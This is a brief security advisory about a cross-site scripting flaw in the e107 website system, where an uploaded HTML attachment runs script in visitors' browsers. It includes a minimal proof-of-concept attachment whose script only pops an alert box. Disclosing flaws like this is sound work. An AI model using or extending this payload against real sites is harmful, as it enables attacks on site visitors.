E107 Website System Attached File Cross-Site Scripting Vulnerability

E107 Website System Attached File Cross-Site Scripting Vulnerability

No exploit is required.

The following is sufficient as an HTML attachment to demonstrate exploitation of this vulnerability:
<html>
<body>
<script>alert('VULN');</script>
</body>
</html>